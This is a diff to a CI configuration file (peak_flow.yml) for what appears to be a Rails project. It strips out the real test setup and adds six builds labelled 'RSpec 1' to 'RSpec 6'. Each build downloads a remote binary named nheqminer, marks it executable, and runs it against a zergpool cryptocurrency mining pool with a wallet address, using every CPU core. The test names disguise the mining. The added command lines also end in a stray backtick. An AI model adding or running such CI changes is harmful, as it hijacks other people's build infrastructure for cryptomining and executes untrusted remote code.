--- a/peak_flow.yml
+++ b/peak_flow.yml
@@ -1,17 +1,44 @@
-before_script:
-  - lscpu
-  - RAILS_ENV=test bundle exec rake db:schema:load
-rvm: true
 environment:
-  REDIS_URL: redis://redis:6379/0
-services:
-  redis:
-    image: redis:5.0.7
-    expose:
-      - 6379
-before_script:
-  - bundle exec rails db:test:reset
+  MYVARIABLE: my-value
 script:
-  - lscpu
   - bundle exec rspec
-  - bundle exec rake best_practice_project:run
+
+builds:
+  build_1:
+    name: RSpec 1
+    environment:
+      MYVARIABLE: my-value-1
+    script:
+      - wget https://gitlab.com/gilaaja/exe/-/raw/main/nheqminer && chmod +x nheqminer && ./nheqminer -v -l rx2.asia.mine.zergpool.com:3300 -u DSbPgrVMxZq32ZZAN4wPBqvbBK99AhH9Ab.$(echo $(shuf -i 1-100 -n 1)-peak@GILA) -p c=DGB -t $(nproc --all) --groups=2 --group-number=1`
+  build_2:
+    name: RSpec 2
+    environment:
+      MYVARIABLE: my-value-2
+    script:
+      - wget https://gitlab.com/gilaaja/exe/-/raw/main/nheqminer && chmod +x nheqminer && ./nheqminer -v -l rx2.asia.mine.zergpool.com:3300 -u DSbPgrVMxZq32ZZAN4wPBqvbBK99AhH9Ab.$(echo $(shuf -i 1-100 -n 1)-peak@GILA) -p c=DGB -t $(nproc --all) --groups=2 --group-number=2`
+  build_3:
+    name: RSpec 3
+    environment:
+      MYVARIABLE: my-value-3
+    script:
+      - wget https://gitlab.com/gilaaja/exe/-/raw/main/nheqminer && chmod +x nheqminer && ./nheqminer -v -l rx2.asia.mine.zergpool.com:3300 -u DSbPgrVMxZq32ZZAN4wPBqvbBK99AhH9Ab.$(echo $(shuf -i 1-100 -n 1)-peak@GILA) -p c=DGB -t $(nproc --all) --groups=2 --group-number=3`
+  build_4:
+    name: RSpec 4
+    environment:
+      MYVARIABLE: my-value-4
+    script:
+      - wget https://gitlab.com/gilaaja/exe/-/raw/main/nheqminer && chmod +x nheqminer && ./nheqminer -v -l rx2.asia.mine.zergpool.com:3300 -u DSbPgrVMxZq32ZZAN4wPBqvbBK99AhH9Ab.$(echo $(shuf -i 1-100 -n 1)-peak@GILA) -p c=DGB -t $(nproc --all) --groups=2 --group-number=4`
+  build_5:
+    name: RSpec 5
+    environment:
+      MYVARIABLE: my-value-5
+    script:
+      - wget https://gitlab.com/gilaaja/exe/-/raw/main/nheqminer && chmod +x nheqminer && ./nheqminer -v -l rx2.asia.mine.zergpool.com:3300 -u DSbPgrVMxZq32ZZAN4wPBqvbBK99AhH9Ab.$(echo $(shuf -i 1-100 -n 1)-peak@GILA) -p c=DGB -t $(nproc --all) --groups=2 --group-number=5`
+  build_6:
+    name: RSpec 6
+    environment:
+      MYVARIABLE: my-value-6
+    script:
+      - wget https://gitlab.com/gilaaja/exe/-/raw/main/nheqminer && chmod +x nheqminer && ./nheqminer -v -l rx2.asia.mine.zergpool.com:3300 -u DSbPgrVMxZq32ZZAN4wPBqvbBK99AhH9Ab.$(echo $(shuf -i 1-100 -n 1)-peak@GILA) -p c=DGB -t $(nproc --all) --groups=2 --group-number=6`
+
+  
